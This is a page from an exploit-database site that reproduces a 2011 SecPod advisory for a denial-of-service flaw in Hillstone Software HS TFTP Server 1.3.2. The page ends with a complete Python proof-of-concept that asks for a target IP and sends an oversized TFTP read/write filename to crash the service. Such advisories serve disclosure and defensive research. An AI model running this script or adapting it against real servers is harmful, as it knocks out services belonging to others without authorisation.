0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Hillstone Software HS TFTP Server Denial Of Service Vulnerability

Author

secpod

Risk

[

Security Risk Unsored

]

0day-ID

Category

Date add

Platform

##############################################################################
# Title     : Hillstone Software HS TFTP Server Denial Of Service Vulnerability
# Author    : Prabhu S Angadi from SecPod Technologies (www.secpod.com)
# Vendor    : http://www.hillstone-software.com/hs_tftp_details.htm
# Advisory  : http://secpod.org/blog/?p=419
#             http://secpod.org/advisories/SecPod_Hillstone_Software_HS_TFTP_Server_DoS.txt
#             http://secpod.org/exploits/SecPod_Exploit_Hillstone_Software_HS_TFTP_Server_DoS.py
# Version   : Hillstone Software HS TFTP 1.3.2
# Date      : 02/12/2011
##############################################################################
 
SecPod ID: 1031                 21/09/2011 Issue Discovered
                        04/10/2011 Vendor Notified
                        No Response from Vendor
                        02/12/2011 Advisory Released
 
 
Class: Denial Of Service                Severity: Medium
 
 
Overview:
---------
Hillstone Software HS TFTP Server version 1.3.2 is prone to a denial of
service vulnerability.
 
 
Technical Description:
----------------------
The vulnerability is caused due to improper validation of WRITE/READ Request
Parameter containing long file name, which allows remote attackers to crash
the service.
 
 
Impact:
--------
Successful exploitation could allow an attacker to cause denial of service
condition.
 
 
Affected Software:
------------------
Hillstone Software HS TFTP 1.3.2
 
 
Tested on:
-----------
Hillstone Software HS TFTP 1.3.2 on Windows XP SP3 & Win 7.
Older versions might be affected.
 
 
References:
-----------
http://secpod.org/blog/?p=419
http://www.hillstone-software.com/index.htm
http://www.hillstone-software.com/hs_tftp_details.htm
http://secpod.org/advisories/SecPod_Hillstone_Software_HS_TFTP_Server_DoS.txt
http://secpod.org/exploits/SecPod_Exploit_Hillstone_Software_HS_TFTP_Server_DoS.py
 
 
Proof of Concept:
----------------
http://secpod.org/exploits/SecPod_Exploit_Hillstone_Software_HS_TFTP_Server_DoS.py
 
 
Solution:
----------
Not available
 
 
Risk Factor:
-------------
    CVSS Score Report:
        ACCESS_VECTOR          = NETWORK
        ACCESS_COMPLEXITY      = LOW
        AUTHENTICATION         = NOT_REQUIRED
        CONFIDENTIALITY_IMPACT = NONE
        INTEGRITY_IMPACT       = NONE
        AVAILABILITY_IMPACT    = PARTIAL
        EXPLOITABILITY         = PROOF_OF_CONCEPT
        REMEDIATION_LEVEL      = UNAVAILABLE
        REPORT_CONFIDENCE      = CONFIRMED
        CVSS Base Score        = 5 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
        Risk factor            = Medium
 
 
POC :
======
 
import socket,sys,time
 
port   = 69
target = raw_input("Enter host/target ip address: ")
 
if not target:
    print "Host/Target IP Address is not specified"
    sys.exit(1)
 
print "you entered ", target
 
try:
    socket.inet_aton(target)
except socket.error:
    print "Invalid IP address found ..."
    sys.exit(1)
 
try:
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
    print "socket() failed"
    sys.exit(1)
 
## File name >= 222 length leads to crash
exploit = "\x90" * 2222
 
mode = "binary"
print "File name WRITE/READ crash"
 
## WRITE command = \x00\x02
data = "\x00\x02" + exploit + "\0" + mode + "\0"
 
## READ command = \x00\x01
## data = "\x00\x01" + exploit + "\0" + mode + "\0"
 
sock.sendto(data, (target, port))
time.sleep(2)
sock.close()
try:
    sock.connect()
except:
    print "Remote TFTP server port is down..."
    sys.exit(1)



#  0day.today [2024-11-16]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Hillstone Software HS TFTP Server Denial Of Service Vulnerability

Report Error

Report Error